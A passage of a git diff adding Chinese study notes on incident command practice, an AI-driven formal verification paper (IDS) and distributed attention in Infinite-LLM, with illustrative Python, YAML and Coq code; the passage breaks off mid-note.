B**:如果三分钟后回滚没效果,下一手是什么?宁可选一个「次优但可执行」的方案,也不要全场沉默等完美答案。 + +### 3. 四阶段循环:Size-Up → Stabilize → Update → Verify + +这是每次重大事故的主循环,来自 [Incident Commander 培训](https://response.pagerduty.com/training/incident_commander/#handling-incidents) 的 **Handling Incidents** 章节。 + +```text + ┌──────────┐ + │ Size-Up │ 什么坏了?影响多大?是否在扩大? + └────┬─────┘ + ▼ + ┌──────────┐ + │ Stabilize│ 收集方案 → 决策 → 征求强烈反对 → 指派任务 + └────┬─────┘ + ▼ + ┌──────────┐ + │ Update │ 定期状态播报(内部 + 利益相关方) + └────┬─────┘ + ▼ + ┌──────────┐ + │ Verify │ 任务完成了吗?好了就收尾;没好就回到 Size-Up + └──────────┘ +``` + +**Size-Up(研判)** 要问: + +- 「What's wrong?」——症状是什么? +- 「Is this affecting multiple services?」——范围、是否在升级? + +**Stabilize(稳住)** 步骤: + +1. 问专家:有哪些动作?风险各是什么? +2. IC 说:**「We're proceeding with …」**(我们按某方案执行) +3. **「Are there any strong objections?」**(有谁强烈反对?)——注意不是「大家都同意吗」,而是只收集**强烈**反对,避免嘈杂与沉默并存 +4. **「Alice, please do X, I'll come back in 3 minutes. Understood?」**——任务必须**指派到具体的人**并**限时** + +**Update(同步)** 在等待时填空,避免会议死寂。 + +**Verify(验证)** 回到被指派的人:完成了吗?没解决则重新 Size-Up。 + +### 4. 话术与反模式(Lingo) + +| 要说 | 不要说 | 原因 | +|------|--------|------| +| 「Bob,请在 3 分钟内查 web 延迟,明白吗?」 | 「谁能看一下延迟?」 | 避免 **bystander effect(旁观者效应)** | +| 「是否有**强烈**反对?」 | 「大家都同意吗?」 | 后者引发叠话或沉默 | +| 「This is [NAME], I am the **Incident Commander**.」 | 「我是 IC」 | 新人不懂缩写;**commander** 明确权威 | +| 「Do you wish to take command?」 | 与高管争论 | **Executive swoop** 时把「夺权」显性化 | + +[During an Incident](https://response.pagerduty.com/during/during_an_incident/) 还规定:SME **只建议、不擅自执行**;IC 不确定是否对外公告时,原则往往是 **「If in doubt, post it out」**(有疑虑就发状态公告)。 + +### 5. 复杂事故:子团队与缩小范围 + +当人数超过 IC 能有效掌控的跨度(通常 ~7 人),可 spin off **Alpha / Bravo / Charlie** 子组:指定组长、限时、**子组只通过组长与 IC 沟通**。 + +根因明确后,IC 应**缩小会议**:点名「请 Deputy、Scribe、SRE 留下,其他人可退出」——凌晨三点的人性化设计。 + +### 6. 指挥权交接(Transfer of Command) + +疲劳、复杂度变化、私人紧急事务都可以交接。流程: + +1. 在 Slack 私聊副 IC 说明上下文; +2. 在会议上:**「I am handing over command to [X].」** +3. 新 IC 重新做开场自我介绍。 + +注意:**更资深的人到场 ≠ 自动换指挥**。职级在和平年代有效,战时只认 IC 角色。 + +### 7. 培训路径 + +PagerDuty 建议的训练阶梯(见 IC 培训页): + +1. 阅读角色文档; +2. 参加 **Failure Friday**(故意演练):先旁观 → 当 Scribe → 当 IC; +3. **Shadow** 一周:跟真实 IC,不发言; +4. **Reverse shadow** 一周:你指挥,导师只在失控时接管; +5. **毕业**:把自己放上 IC on-call 排班。 + +游戏 *Keep Talking and Nobody Explodes* 被当作低成本协调练习——信息不完整、一人指挥、多人执行。 + +## 代码示例一:用 Python 实现「限时任务看板」(IC 的委派追踪器) + +IC 的核心负担之一是:**谁在被指派什么、何时该追问**。下面是一个极简的 in-memory 任务看板,可在事故 Slack bot 或 CLI 里使用;体现培训页里的 **assign → time-box → acknowledge** 三步。 + +```python +from dataclasses import dataclass, field +from datetime import datetime, timedelta +from enum import Enum +import json + +class TaskState(str, Enum): + ASSIGNED = "assigned" + ACKED = "acked" + DONE = "done" + OVERDUE = "overdue" + +@dataclass +class IncidentTask: + assignee: str + instruction: str + due_at: datetime + state: TaskState = TaskState.ASSIGNED + ack_text: str = "" + + def is_overdue(self, now: datetime) -> bool: + return self.state not in (TaskState.DONE,) and now >= self.due_at + +class IncidentBridge: + """模拟事故桥接器:IC 委派、Deputy 可轮询超时""" + + def __init__(self, incident_id: str, commander: str): + self.incident_id = incident_id + self.commander = commander + self.tasks: list[IncidentTask] = [] + + def assign(self, assignee: str, instruction: str, minutes: int) -> IncidentTask: + task = IncidentTask( + assignee=assignee, + instruction=instruction, + due_at=datetime.utcnow() + timedelta(minutes=minutes), + ) + self.tasks.append(task) + return task + + def acknowledge(self, assignee: str, text: str = "Understood") -> None: + for t in reversed(self.tasks): + if t.assignee == assignee and t.state == TaskState.ASSIGNED: + t.state = TaskState.ACKED + t.ack_text = text + return + raise ValueError(f"no open task for {assignee}") + + def complete(self, assignee: str) -> None: + for t in reversed(self.tasks): + if t.assignee == assignee and t.state != TaskState.DONE: + t.state = TaskState.DONE + return + + def overdue(self, now: datetime | None = None) -> list[IncidentTask]: + now = now or datetime.utcnow() + out = [] + for t in self.tasks: + if t.is_overdue(now): + t.state = TaskState.OVERDUE + out.append(t) + return out + + def ic_status_line(self) -> str: + """生成 Update 阶段的口播提纲""" + parts = [f"INC {self.incident_id} — commander {self.commander}"] + for t in self.tasks: + parts.append( + f"- {t.assignee}: {t.instruction} [{t.state.value}, due {t.due_at.isoformat()}Z]" + ) + return "\n".join(parts) + +# --- 模拟一次 Stabilize 阶段的委派 --- +bridge = IncidentBridge("INC-2026-0412", commander="Alice") +bridge.assign("Bob", "check p99 latency on checkout-api", minutes=3) +bridge.assign("Carol", "confirm last deploy hash for payments", minutes=5) +bridge.acknowledge("Bob") + +print(bridge.ic_status_line()) +print("overdue:", [t.assignee for t in bridge.overdue()]) +``` + +要点: + +- 每个任务绑定**一个人 + 截止时间**,对应 IC 话术里的 **「I'll come back to you in X minutes」**; +- Deputy 可以定时调用 `overdue()` 提醒 IC 追问; +- `ic_status_line()` 帮助 Scribe 把 Update 口播结构化。 + +## 代码示例二:事故响应 Runbook 的 YAML + 检查清单生成 + +把 ICS 流程固化成可版本化的 runbook,便于 onboarding 与演练。下面 YAML 描述角色、阶段检查项与标准口播;用短脚本渲染成值班笔记本。 + +```yaml +# incident-runbook.yaml — 与 PagerDuty open-source IR 对齐的骨架 +incident: + severity: SEV-1 + bridge: + zoom: "https://example.com/bridge/rotating" + slack: "#inc-sev1" + roles: + incident_commander: oncall-ic + deputy: oncall-ic-shadow + scribe: auto-rotate + customer_liaison: oncall-support-lead + +phases: + size_up: + prompts: + - "What's wrong? (symptoms)" + - "Is this affecting multiple services?" + - "Is impact escalating, flapping, or static?" + stabilize: + decision_template: "We're proceeding with {action} because {rationale}." + objection_poll: "Are there any strong objections to this plan?" + assign_template: "{name}, please {task}. I'll come back in {minutes} minutes. Understood?" + update: + cadence_minutes: 5 + public_status_if_in_doubt: true + verify: + follow_up: "Have you finished {task}?" + +announcements: + start: "This is {name}, I am the Incident Commander for this call." + handover: "Everyone on the call, be advised, I am handing over command to {name}." + end: "We're ending the call at this time. Follow-up in {slack}. Thanks everyone." +``` + +```python +#!/usr/bin/env python3 +"""render-runbook.py — 从 YAML 生成 IC 口袋检查清单""" +import sys +from pathlib import Path +import yaml + +def main(path: Path) -> None: + doc = yaml.safe_load(path.read_text()) + inc = doc["incident"] + print(f"# Incident checklist — {inc['severity']}\n") + print("## Roles") + for role, who in inc["roles"].items(): + print(f"- {role}: {who}") + print("\n## Phases") + for phase, body in doc["phases"].items(): + print(f"\n### {phase}") + for key, val in body.items(): + if isinstance(val, list): + for item in val: + print(f"- [ ] {item}") + else: + print(f"- {key}: {val}") + print("\n## Announcements") + for name, tmpl in doc["announcements"].items(): + print(f"- {name}: `{tmpl}`") + +if __name__ == "__main__": + main(Path(sys.argv[1])) +``` + +运行 `python render-runbook.py incident-runbook.yaml` 会得到可打印的检查清单,适合 **Failure Friday** 或新 IC shadow 时随身携带。 + +## 与「普通 on-call」的差异 + +| 维度 | 普通 on-call | ICS 重大事故模式 | +|------|--------------|------------------| +| 决策 | 谁懂谁上 | **唯一 IC**,职级让位 | +| 沟通 | Slack 自由讨论 | 口播 + Scribe 时间线 | +| 修复 | 处理人可能即指挥 | **指挥与执行分离** | +| 对外 | 临时拼凑公告 | Customer Liaison + IC 审批 | +| 事后 | 口头吐槽 | 指定 postmortem 负责人 | + +Getting Started 文档建议:**先从 IC 角色起步**,有人够再加 Scribe;用**假事故**练「和平时期到战时」的心态切换。 + +## 常见坑(Incident Response Pitfalls) + +1. **IC 亲自查日志** — 失去全局视角;应立刻委派给 SME。 +2. **「Can someone…」** — 任务悬空;必须点名。 +3. **无限时指派** — 无法 Verify;三分钟、五分钟都要说出来。 +4. **会议不缩小** — 无关人员凌晨耗着,次日二次事故。 +5. **高管夺权但不接班** — 用 **「Do you wish to take command?」** 把权责说清楚。 +6. **只有一位 IC** — 应尽早培养多人并 **daily on-call rotation**(PagerDuty 建议从周排班尽快过渡到日排班)。 + +## 落地清单(给零基础团队) + +1. 定义何为 **major incident**(例如 SEV-1/SEV-2 触发桥接)。 +2. 指定沟通渠道(Zoom/Meet + `#incident` Slack)。 +3. 选 2–3 人训练 IC,建立 shadow 机制。 +4. 写一页纸 runbook:角色表 + 四阶段 + 三条口播模板。 +5. 每月一次演练(Failure Friday 或 game day)。 +6. 每次真实事故后做 **blameless postmortem**,Scribe 的时间线是输入。 + +## 进一步阅读 + +- [Incident Commander 培训](https://response.pagerduty.com/training/incident_commander/) — 本文主来源 +- [Different Roles](https://response.pagerduty.com/before/different_roles/) — 角色职责全文 +- [During an Incident](https://response.pagerduty.com/during/during_an_incident/) — IC / Deputy / SME 分步指令 +- [Getting Started](https://response.pagerduty.com/getting_started/) — 最小可行 ICS +- [Incident Response Training 课程快照](https://response.pagerduty.com/training/courses/incident_response/) — 2018 开源课件 +- 关联笔记:[[chaos-engineering-netflix-2016]]、[[dora-state-of-devops-2023]] + +## 小结 + +**Incident Command System for Tech Operations** 不是又一个 on-call 排班表,而是一套**战时宪法**:谁指挥、谁执行、谁记录、谁对外说话,以及决策时用什么句子。PagerDuty 用十年事故经验证明:把 ICS 从火灾现场搬到数据中心,能显著降低「人越多越乱」的协调税。你不必是最强的调试者,但必须能让最强的那几个人**朝同一个方向用力**——这就是 Incident Commander 存在的理由。 diff --git a/src/content/docs/papers/inductive-deductive-synthesis-verified-distributed-systems-arxiv-2605-23109.md b/src/content/docs/papers/inductive-deductive-synthesis-verified-distributed-systems-arxiv-2605-23109.md new file mode 100644 index 000000000..ebc4cf748 --- /dev/null +++ b/src/content/docs/papers/inductive-deductive-synthesis-verified-distributed-systems-arxiv-2605-23109.md @@ -0,0 +1,315 @@ +--- +title: "Inductive Deductive Synthesis: Enabling AI to Generate Formally Verified Systems" +来源: https://arxiv.org/abs/2605.23109 +日期: 2026-06-13 +分类: 分布式系统 +子分类: 共识与复制 +provenance: pipeline-v3 +--- + +# Inductive Deductive Synthesis (IDS) 学习笔记 + +## 一句话总结 + +IDS 让 AI 像人一样"边写代码边证明",通过归纳(从失败中学习新策略)和演绎(在每个步骤用形式化验证器检查)相结合的方式,自动生成**可机器验证的分布式系统**,7/7 通过之前连 GPT-5.4 和 Claude Opus 4.6 都搞不定的 7 个分布式一致性规范,耗时仅约 6.8 小时,花费约 $106/规范。 + +## 从日常类比开始 + +### 拼乐高 vs. 盖大楼 + +想象你在盖一栋大楼: + +**传统 AI 编程** 就像让你"先把整栋楼盖好,再检查结构是否安全"。AI 先写出所有代码,最后才跑测试。问题是:大楼如果地基打错了,前面几百层全得拆。分布式系统尤其致命——可能有万亿种消息交错顺序,测试永远覆盖不完。 + +**IDS 的做法** 则是"每铺一块砖,就让结构工程师检查一块"。每写几行代码,就立刻用 Rocq(形式化验证工具)证明这段代码满足规范。证明不了?立刻回退,换一种设计。如果一种策略连续失败,换一个"架构师"(ISA)来想新方案。 + +这就像"链式思考"(chain-of-thought),但中间每一步都是**形式化验证过的**,不是 AI 的直觉。 + +--- + +## 三个核心概念 + +### 1. 形式化验证(Formal Verification) + +传统测试只能证明"某些输入下程序是对的"。形式化验证要证明"对所有可能的输入,程序都是对的"。 + +它有三要素: +- **规范(Specification)**:用数学语言精确描述"什么是对的" +- **实现(Implementation)**:实际代码 +- **证明(Proof)**:用机器检查器(如 Rocq)验证"实现满足规范" + +### 2. 归纳合成(Inductive Synthesis) + +从失败中学习。当一条路走不通时,不是一遍遍重试同一个策略,而是让另一个 Agent 分析失败原因,提出全新的设计方向。 + +类比:你写代码卡住了,请一位资深架构师来看,他说"别在这个方向上了,试试把数据结构换一下"。 + +### 3. 演绎合成(Deductive Synthesis) + +从规范出发,一步步推导出实现。每个实现步骤都伴随着对应的证明步骤。 + +类比:给定"大楼必须抗震"的设计要求,你先选地基类型,再选框架类型,每一步都让结构工程师签字确认。 + +### IDS 的魔力在于两者的结合 + +归纳负责"换策略",演绎负责"在某个策略下推进"。两者形成一个闭环。 + +--- + +## IDS 的架构 + +IDS 有三个核心角色: + +**Coordinator(协调者)**:系统的大脑。启动多个 DSA,监控进度,在 Agent 卡住时调用 ISA,对完成候选做性能测试。 + +**DSA — Deductive Synthesis Agent(演绎合成 Agent)**:一个 LLM Agent,在给定策略下逐步构建代码+证明。每一步都交给 Rocq 验证器检查。如果通过,保存状态;如果失败,修复或回退。 + +**ISA — Inductive Synthesis Agent(归纳合成 Agent)**:当 DSA 卡住时介入,分两个角色: +- **Proposer(提议者)**:战术层面。"当前策略不错,但卡在某个证明上,试试加一个辅助引理。" +- **Reloader(重载者)**:战略层面。"当前策略是死路,换个全新的高层设计。" + +--- + +## 第一个代码示例:计数器(Counter) + +论文用了一个极简例子展示 IDS 如何工作。先理解它,就能理解整个框架。 + +### 规范(Specification) + +```coq +Module Type CounterSpec. + +Parameter t : Type. (* 状态类型 *) +Parameter init : t. (* 初始状态 *) +Parameter inc : t -> t. (* 递增操作 *) +Parameter read : t -> nat. (* 读取操作,返回自然数 *) + +(* 属性1: 初始状态的读数为 0 *) +Axiom read_init : + read init = 0. + +(* 属性2: 递增后再读,比之前多 1 *) +Axiom read_inc : + forall s, + read (inc s) = S (read s). + +End CounterSpec. +``` + +这个规范说了两件事:数从 0 开始;每 inc 一次,read 的结果就加 1。 + +### IDS 的逐步合成 + +**第 0 步:部分实现 + 部分证明** + +IDS 先选一个状态表示——用一个列表,列表长度就是计数。 + +```coq +Definition t := list unit. +Definition init : t := nil. + +Definition read (s : t) := + length s. + +Theorem read_init : + read init = 0. +Proof. reflexivity. Qed. +(* 这个定理证明了!初始空列表长度为 0 *) + +(* inc 的实现先留空 *) +Definition inc (s : t) : t. +Admitted. + +(* 对应的证明也留空 *) +Theorem read_inc : + forall s, + read (inc s) = S (read s). +Admitted. +``` + +关键:`Admitted` 是一个"占位符"。Rocq 验证器**仍然接受这个文件**,因为目前所有已证明的部分都通过了。这就是 IDS 的核心机制——**部分证明也是可以被检查的**。 + +**第 1 步:补全实现** + +```coq +Definition inc (s : t) := tt::s. (* 在列表头部加一个元素 *) + +Definition read (s : t) := + length s. + +Theorem read_inc : + forall s, + read (inc s) = S (read s). +Proof. + intros s. unfold read, inc. + simpl. reflexivity. Qed. +``` + +现在整个系统完整了,Rocq 验证器确认所有定理都证明完毕。 + +### 从计数器到分布式系统 + +这个计数器只是入门。在分布式系统中: + +- `inc` 变成多个客户端并发写入 +- `read` 可能从不同副本读取 +- 需要保证"我写入的值,下次读能读到"(Read-Your-Writes) +- 需要保证" causally related 的操作顺序正确"(Causal Consistency) + +IDS 的 DSA 在证明这些属性时,会不断尝试不同数据结构和证明策略。比如对 Chapar CC 规范: +- 第一次尝试:用一个大对象存所有 key → 证明卡住 +- ISA Reloader 介入:改成每个 key 一个独立表格 → 证明可以分解为每个 key 的小问题 → **通过** + +--- + +## 第二个代码示例:Read-Your-Writes 规范 + +这是 IDS suite 中最简单的分布式一致性规范之一: + +```coq +Module Type RYWSpec. + +Parameter t : Type. (* 副本状态 *) +Parameter op : Type. (* 操作: Put(key, value) 或 Get(key) *) +Parameter exec : list op -> nat -> option value. + (* 执行一个操作序列,返回某个 key 的读取结果 *) + +(* Read-Your-Writes 属性: + 如果客户端先 Put(k, v),然后 Get(k), + 那么在 Put 之后发出的 Get,必须能看到 v。 *) +Axiom ryw : + forall (ops : list op) (k : key) (v : value) (prefix post : list op), + Put k v :: prefix ++ Get k :: post = ops -> + exec (prefix ++ Get k :: post) = Some v. + +End RYWSpec. +``` + +IDS 的 DSA 会为这个规范生成一个多副本协议实现: +- 每个副本用向量时钟(vector clock)或每客户端计数器来追踪状态 +- 每次 Put 时附加发送者的计数器 +- 每次 Get 时检查是否收到足够的信息 + +如果某个数据结构导致证明无法分解(比如证明需要同时考虑所有 key),ISA Reloader 会触发,建议换一种表示方式。 + +--- + +## 关键机制详解 + +### 部分证明(Partial Proofs) + +Rocq 的验证器对 `Admitted` 的处理是 IDS 能工作的基础: + +``` +完整实现 + 完整证明 → Rocq 接受 ✓ +部分实现 + Admitted 占位符 → Rocq 仍然接受 ✓ +不类型检查的代码 → Rocq 拒绝 ✗ +``` + +这意味着 IDS 可以在"证明完成一半"的状态下判断当前设计方向是否正确。这相当于在每个步骤都得到**精确、无假阳性/假阴性**的反馈。 + +### 从验证到性能的闭环 + +IDS 不只是证明正确性。一旦一个候选实现完成(无论证明是否关闭),Coordinator 就把它提取为 OCaml 代码,在 5 台 VM 的 Google Cloud 集群上跑性能测试: + +- 吞吐(throughput) +- P99 延迟 +- 峰值内存 +- 每 worker 操作数缩放 + +性能数据反馈给 ISA,指导它选择更高效的实现。最终 IDS 生成的实现比手动编写的参考实现最高快 3 倍。 + +--- + +## 实验结果 + +### 正确性对比 + +| 规范 | Codex (GPT-5.4) | Claude Code (Opus 4.6) | IDS | +|------|:-:|:-:|:-:| +| Chapar CC | 0/3 | 0/3 | 3/3 | +| RYW | 3/3 | 3/3 | 3/3 | +| MR | 0/3 | 0/3 | 3/3 | +| MW | 2/3 | 3/3 | 3/3 | +| RYW+MW | 0/3 | 1/3 | 3/3 | +| CC | 0/3 | 0/3 | 2/3 | +| LCC | 0/3 | 0/3 | 3/3 | +| **总计** | **2/7** | **2/7** | **7/7** | + +### 效率 + +- IDS 平均每个规范耗时约 6.8 小时,花费约 $106 +- 比人类专家快约 200 倍(人类需要 9-12 个月) +- 比 SOTA Agent 便宜约 17% + +### 性能 + +IDS 生成的实现在所有 7 个规范上匹配或超越手写专家实现,Chapar CC 上比官方向量时钟实现快 3 倍。 + +### 消融实验(Ablation) + +去掉任何组件都会显著下降: + +- 去掉联合合成(-J):7 个规范中只剩 RYW 能过 +- 去掉 Rocq 反馈(-VF):所有规范通过率降至 ≤1/3 +- 去掉审计(-A):出现过"put 守卫永远返回 false"这种 trivial 但通过验证的 bug +- 去掉 Proposer(-P):最难规范全部 0/3 通过 +- 去掉 Reloader(-R):最难规范全部 0/3 通过 + +最关键的单个组件是 **Rocq 反馈**——结构化诊断(目标、假设、tactic 回溯)vs. 简单的通过/拒绝,前者让 DSA 能精确知道哪里错了。 + +--- + +## 为什么这很重要 + +### 1. 形式化验证不再是"专家特权" + +传统上,证明一个分布式系统正确需要 9-12 个月专家时间。IDS 把这个变成了"给规范,几小时后自动获得可验证实现"。 + +### 2. 测试的局限性被揭示 + +Codex GPT-5.4 即使收到 100 个候选实现 + 完整形式规范,在 4 个分布式属性上只通过了 1 个。测试和"vibe coding"永远无法覆盖分布式系统的状态空间。 + +### 3. 这是"可验证编程"的转折点 + +论文作者用了一个精彩的说法:IDS 把 **vibe coding**(凭感觉编程)变成了 **verified coding**(可验证编程)。AI 生成的不再是"可能对的代码",而是"机器验证过对的代码"。 + +### 4. 通用性 + +IDS 不依赖 Rocq。Lean 4、Verus 等验证器也能用。问题领域也不限于分布式系统——操作系统内核、编译器、密码协议、硬件设计都适用。 + +--- + +## 局限性和开放问题 + +1. **规范瓶颈**:IDS 需要手写 Rocq 规范,这本身就是最困难的环节。论文作者计划探索 LLM 辅助的自然语言→形式规范转换。 + +2. **评估范围**:目前只在 KV 存储一致性上验证,OS 协议、密码原语等领域待探索。 + +3. **未覆盖的场景**:7 个规范没有包含节点扩缩容、故障恢复、可观测性等生产系统需求。 + +--- + +## 我的理解:IDS 的哲学 + +IDS 的核心思想其实很朴素:**不要一口气吃成胖子**。 + +传统的 AI 编程方式是"先写代码,再证明"——等同于人类"先把证明写完再写代码",这两者都被证明极其困难。 + +IDS 的突破在于把问题变成了**交互式搜索**: +- 每一步都很小(写几行代码 + 证一个小引理) +- 每一步都有精确反馈(Rocq 验证器说 yes/no) +- 失败时有人帮你换策略(ISA Proposer/Reloader) +- 成功了还要跑性能测试(Coordinator 的 benchmark 环节) + +这本质上就是把人类写代码时"边写边想、卡住就换思路、最后检查对不对"这个过程,形式化后交给 AI Agent 系统自动执行。 + +--- + +## 延伸阅读 + +- 论文完整代码:https://github.com/skydiscover-ai/skydiscover +- Rocq 文档:https://rocq-lang.org/ +- Chapar 原始论文:Lesani et al., Chapar: Certified Causally Consistent Distributed Key-Value Stores +- Dafny、Verus、Lean 4 等其它形式化验证工具 +- AlphaVerus: bootstrapping formally verified code generation through self-improving translation diff --git a/src/content/docs/papers/infer-biabduction.md b/src/content/docs/papers/infer-biabduction.md index 79b8b89be..d5a3a6220 100644 --- a/src/content/docs/papers/infer-biabduction.md +++ b/src/content/docs/papers/infer-biabduction.md @@ -167,5 +167,6 @@ bi-abduction 配合**抽象**(把具体堆图归纳成 `list(l)` 谓词)推 - [[hoare-logic]] —— Hoare Logic — 把"程序对不对"变成"数学证明对不对" - [[reynolds-separation-logic]] —— Separation Logic — 把 Hoare 逻辑扩到带指针的程序 - [[sagiv-shape-analysis]] —— Sagiv 参数化形状分析 — 用三值逻辑证明链表树仍是链表树 +- [[spec-agent-separation-logic]] —— Spec-Agent — 用 Agent + 分离逻辑 + Fuzz 自动写 C++ 合约 - [[steensgaard-pointer]] —— Steensgaard 指针分析 — 用等价合并把指针分析压到几乎线性 diff --git a/src/content/docs/papers/infinite-llm.md b/src/content/docs/papers/infinite-llm.md new file mode 100644 index 000000000..86c0b5c0d --- /dev/null +++ b/src/content/docs/papers/infinite-llm.md @@ -0,0 +1,373 @@ +--- +title: Infinite-LLM — 把注意力层拆出去,让 GPU 集群一起扛长上下文 +来源: https://arxiv.org/abs/2401.02669 +日期: 2026-06-13 +分类: 分布式系统 +子分类: LLM系统 +provenance: pipeline-v3 +--- + +## 从日常类比开始:合唱团的「声部分配」 + +想象一个合唱团在做演唱(LLM 推理): + +1. **歌词输入阶段(Prefill)**:歌手一次性拿到整段歌词,快速读一遍,然后唱出第一个音符。这一步像"大火爆炒"——所有人都要同时看同一份乐谱。 + +2. **逐字生成阶段(Decode)**:之后每唱一个词,歌手都要回头看之前所有唱过的歌词(KVCache),再决定下一个音。歌词越长,回顾的"乐谱"越厚,消耗的时间越多。 + +**传统做法**:每个合唱团(GPU 实例)独立负责自己的演唱。如果一个团的歌词特别长(长上下文),它需要把整本乐谱背下来——要么占用一台大合唱团的全部空间,要么干脆排不下。而那些歌词短的团,空间闲着也没用。 + +**Infinite-LLM 的做法**:把"回头看乐谱"这件事(Attention 层)从每个团的独立任务中拆出来,分配给集群里所有可用的"声部"。短团的空闲空间可以被长团借来存放部分乐谱,大家分工合作。 + +一句话:**不是让单张 GPU 变出更多显存,而是承认 Attention 层和其余层的资源需求不同,把 Attention 的计算和 KVCache 存储拆出去,用整个集群的显存池来服务。** + +--- + +## 核心问题:为什么现有方案搞不定长上下文? + +LLM 的推理有两个关键部分,它们的资源行为**截然不同**: + +| 层类型 | 代表层 | 内存需求随上下文长度变化? | 计算依赖 batch size? | +|---|---|---|---| +| Attention 层 | QKV Linear + Multi-Head Attention | **是**——KVCache 随序列长度线性增长 | 否——每次只处理一个 token | +| 非 Attention 层 | FFN(前馈网络) | **否**——参数量固定 | **是**——batch 越大越能利用 GEMM | + +这就是矛盾所在: + +- **短请求**(1K token):KVCache 很小,15GB 就够,甚至不到一张 A100 的容量。但如果为了同时支持 2000K token 而给每张实例分配 32 张 GPU,短请求就被"过度并行"了——FFN 层被切到太多 GPU,通信开销大,反而跑不快。 +- **长请求**(1000K token):KVCache 超过 500GB,相当于 7 张 A100 的容量。单张卡或少数几张卡根本存不下,必须跨卡分配。 +- **同一张实例上**:长请求吃满了显存,batch size 被迫降到 1,FFN 层的计算利用率几乎为零。 + +传统的模型并行(Tensor Parallelism / Pipeline Parallelism)是**静态**的——每个实例分到的 GPU 数量在启动时就定死了。它无法根据请求的上下文长度动态调整 Attention 层和非 Attention 层的 GPU 分配。 + +--- + +## 核心概念 1:DistAttention — 注意力分布式计算的数学魔法 + +DistAttention 是 Infinite-LLM 最核心的创新。它回答了这个问题:**如果把 KVCache 按序列维度切分到不同 GPU 上,每个 GPU 怎么独立计算自己那部分的 Attention,而不需要把所有 KVCache 搬回来?** + +### 原始 Attention 的痛点 + +标准 Attention 的计算公式是: + +``` +Attention(Q, K, V) = Σ [exp(QK^T - m_g) / Σ exp(QK^T - m_g)] * V +``` + +其中 `m_g = max(QK_1, ..., QK_seq)` 是**全局最大值**,需要在所有序列上取最大,再做全局求和。 + +如果直接把 KVCache 切分到多个 GPU 上,每个 GPU 只拿到一部分 K 和 V,那: +- 全局最大值 m_g 没法在局部计算 +- 全局求和没法在局部完成 +- 每次计算都要把所有 KVCache 从远程 GPU 搬回来 + +这会导致每个 decode 步骤都传输 GB 甚至 TB 级别的数据,彻底瘫痪性能。 + +### DistAttention 的数学等价变换 + +DistAttention 受在线 Softmax(online softmax)启发,对 Attention 公式做了等价变换,把全局操作拆解为**局部操作 + 少量聚合**: + +**第一步**:每个 GPU(称为一个分片)在自己的局部序列上做独立的 Attention 计算: + +``` +m_j = max(QK_1, ..., QK_seq_p) // 局部最大值 +e_j = Σ exp(QK_i^T - m_j) // 局部归一化因子 +MA_j = Σ [exp(QK_i^T - m_j) * V_i] // 局部注意力加权和 +``` + +**第二步**:各分片把自己的结果(只有 `MA_j`、`m_j`、`e_j` 三个小量)发回主 GPU 做聚合: + +``` +m_g = max(m_1, ..., m_b) // 全局最大值 +e_g = Σ e_j * exp(m_j - m_g) // 全局归一化因子 +Attention = Σ MA_j * exp(m_j - m_g) / e_g // 加权求和 +``` + +**关键点**:分片只需要传输 query 向量和 2 个 float 值(`e_j`、`m_j`),总共只有**几 KB** 的数据,而不是 GB 级别的 KVCache。 + +### 代码示例 1:DistAttention 原理示意 + +```python +import torch +import torch.nn.functional as F + +def standard_attention(Q, K, V): + """ + 标准 Multi-Head Attention(单 GPU,所有 KVCache 本地) + Q: [batch, heads, 1, d] — 当前生成 token 的 query + K: [batch, heads, seq, d] — 完整 KVCache + V: [batch, heads, seq, d] — 完整 KVCache + """ + # QK^T: [batch, heads, 1, seq] + scores = torch.matmul(Q, K.transpose(-2, -1)) / (d ** 0.5) + # softmax:逐行减去最大值做数值稳定 + scores = F.softmax(scores, dim=-1) + # 加权求和 + output = torch.matmul(scores, V) # [batch, heads, 1, d] + return output + + +def dist_attention(Q, distributed_blocks, d): + """ + DistAttention:KVCache 被切分为 b 个分片,各自存在不同 GPU 上 + Q: [batch, heads, 1, d] — 主 GPU 上的 query + distributed_blocks: [(K_j, V_j), ...] — 每个分片的局部 KVCache + 每个分片 (K_j, V_j) 形状为 [batch, heads, seq_p, d] + """ + local_outputs = [] # 收集各分片的结果 + local_m = [] # 收集各分片的局部最大值 + local_e = [] # 收集各分片的局部归一化因子 + + # ========== 第 1 步:各分片独立计算 ========== + for K_j, V_j in distributed_blocks: + # 局部 QK^T + scores_j = torch.matmul(Q, K_j.transpose(-2, -1)) / (d ** 0.5) + + # 局部数值稳定:减去局部最大值 + m_j = scores_j.max(dim=-1, keepdim=True).values # [batch, heads, 1, 1] + stabilized = scores_j - m_j + + # 局部 softmax 的分子部分(不除以分母) + exp_scores = torch.exp(stabilized) # [batch, heads, 1, seq_p] + + # 局部加权和 + ma_j = torch.matmul(exp_scores, V_j) # [batch, heads, 1, d] + + # 局部归一化因子:exp_scores 所有元素求和 + e_j = exp_scores.sum(dim=-1, keepdim=True) # [batch, heads, 1, 1] + + local_outputs.append(ma_j) + local_m.append(m_j) + local_e.append(e_j) + + # ========== 第 2 步:主 GPU 聚合 ========== + # 全局最大值:m_g = max(m_1, ..., m_b) + m_g = torch.cat(local_m, dim=-1).max(dim=-1, keepdim=True).values + + # 全局归一化因子:e_g = Σ e_j * exp(m_j - m_g) + weighted_e = sum( + e_j * torch.exp(m_j - m_g) + for m_j, e_j in zip(local_m, local_e) + ) + e_g = weighted_e.sum(dim=-1, keepdim=True) + + # 加权求和:Attention = Σ MA_j * exp(m_j - m_g) / e_g + weighted_outputs = sum( + ma_j * torch.exp(m_j - m_g) + for ma_j, m_j in zip(local_outputs, local_m) + ) + output = weighted_outputs / e_g # [batch, heads, 1, d] + + return output +``` + +**对比通信量**: +- 传统方案:每次 decode 需要传输整个 KVCache(对于 1000K token 可能是 **500GB+**) +- DistAttention:每次 decode 只传输 query(几 KB)+ 各分片的 `m_j`、`e_j`(每个分片只有几字节) + +聚合步骤的计算量不到总计算量的 1%,完全可以忽略。 + +--- + +## 核心概念 2:集群级 KVCache 调度 — "债务人"与"债权人" + +DistAttention 让 Infinite-LLM 可以按任意粒度拆分和调度 KVCache。这不仅仅是为了支持超长请求,更是为了**整体提升集群吞吐量**。 + +### 场景:四个 GPU 实例 + +``` +实例 A:处理一个 1000K 长请求 → 显存占满,batch size = 1(FFN 利用率极低) +实例 B:处理短请求 → batch size = 50,但剩余大量空闲显存 +实例 C:处理短请求 → batch size = 30,还剩不少显存 +实例 D:处理一个 500K 长请求 → 显存快满了,batch size 被迫降到 3 +``` + +### 两种调度策略对比 + +**策略 1:被动放置**(传统方法) +- 长请求的 KVCache 超出单实例容量时,才把新块放到有剩余空间的实例上 +- 结果:实例 A 的 batch size 